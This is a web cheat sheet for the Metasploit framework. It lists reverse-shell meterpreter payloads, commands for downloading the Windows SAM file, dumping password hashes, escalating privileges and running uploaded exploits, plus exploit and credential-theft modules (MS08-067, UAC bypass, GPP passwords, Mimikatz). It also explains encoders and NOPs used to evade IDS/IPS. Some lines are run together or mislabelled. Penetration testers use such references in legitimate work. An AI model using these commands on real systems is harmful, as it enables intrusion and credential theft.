List of Metasploit Commands – The Cheatsheet

List Of Metasploit Commands

Metasploit was created by H. D. Moore in 2003 as a portable network tool that uses Perl. In 2007, the Metasploit Framework was completely rewritten in Ruby. Here’s List Of Metasploit Commands.

On October 21, 2009, the Metasploit Project announced that it has been acquired by Rapid7, a security company that provides unified vulnerability management solutions. So, List Of Metasploit Commands Introduced.

So, Like comparable commercial products, such as the realization of Canvas Immunity Core Compact or Core Security Technologies, Metasploit can be used to test the vulnerability of computer systems or break into remote systems.

How many information security tools, Metasploit can be used for both legitimate and unauthorized businesses. Since the acquisition of Metasploit Framework, Rapid7 has added two proprietary open source editions called Metasploit Express and Metasploit Pro.

Also Read: Founder Committed Suicide in Jail; AlphaBay Shut Down After Police Raid

The emerging position as the exploitation of Metasploit development framework has in fact resulted in the release of software vulnerabilities tips often accompanied by a third module Metasploit that highlights the possibility of exploitation, risk, and repair of that particular error exploit.

Metasploit 3.0 has begun to include fuzzing tools, which is used to find vulnerabilities in software, rather than simple exploits of known errors. This avenue can be seen with the integration of Lorcan wireless tools (802.11) in Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

List of Metasploit Commands, Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcpset ViewOnly falseMeterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload

Also Read: Ubuntu Linux for Windows 10 – You Heard It Absolutely Right

List of Metasploit Commands, Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\\windowsMeterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -cCreates new channel with cmd shell
psMeterpreter show processes
shellMeterpreter get shell on the target
getsystemMeterpreter attempts priviledge escalation the target
hashdumpMeterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetMeterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r targetMeterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows List Of Metasploit Commands Modules (exploits)

use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privsMetasploit show privileges of current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
load mimikatz -> wdigestMetasplit load Mimikatz
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to

Basic List Of Metasploit Commands

Basic Metasploit command to update framework.

This command should update the Metasploit framework to the latest version. The updates say that we should be expecting updates weekly(ish). Beware: Running this command might break your Metasploit installation.

List Of Metasploit Commands


Metasploit Commands msfconsole/help

This is what you see when booting msfconsole for the first time. In case you don’t know anything about msfconsole you can type: help to view all commands.

List Of Metasploit Commands



List Of Metasploit Commands

It would be a waste of time explaining all these commands. however, these are the basic most used commands you’re going to see.

  • Basic commands: search, use, back, help, info, and exit.
  • Exploit commands: set to set variables and show to show the exploit options, targets, payloads, encoders, nops and the advanced and evasion options.
  • Exploit execution commands: run and exploit to run exploits against a target.

These are the basic Metasploit Commands!

search command

the search command is used to search exploits and vulnerabilities from msfconsole.

List Of Metasploit Commands

List Of Metasploit Commands



info command

info command is used to take a look at the documentation and owner of the exploit.


List Of Metasploit Commands

show options of List Of Metasploit commands

We can use show options command to display values required by the payload to attack our victim machine.

List Of Metasploit Commands

List Of Metasploit Commands



LHOST: Use Local IP Address | If your attacking WAN network you need to set LHOST to static IP Address IP and port forward

LPORT: If you’re attacking in LAN Network then you don’t need to port forward use any port you want. | If you’re attacking WAN Network then you have to port forward that port.


List Of Metasploit Commands

Show Payloads

When we use the show payloads command the msfconsole will return a list of compatible payloads for this exploit. In our flash player exploit example it will return quite a few compatible payloads:


List Of Metasploit Commands

Show targets

The show targets command will return a list of operating systems which are vulnerable to the selected exploit. When we run the command we get the following output for the adobe_flash_shader_drawing_fill exploit:

Show advanced

By using the show advanced command we can have a look at the advanced options for the exploit.


List Of Metasploit Commands

Show encoders

The show encoders command will return the compatible encoders. Encoders are used to evade simple IDS/IPS signatures that are looking for certain bytes of your payload. We will be looking at encoders in detail in a later chapter of the Metasploit tutorials.


List Of Metasploit Commands

Show nops

The show nops command will return a list of NOP generators. A NOP is short for No Operation and is used to change the pattern of a NOP sled in order to bypass simple IDS/IPS signatures of common NOP sleds. The NOP generators start with the CPU architecture in the name. We will be looking at NOPS in a later chapter of this tutorial.

List Of Metasploit Commands



Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.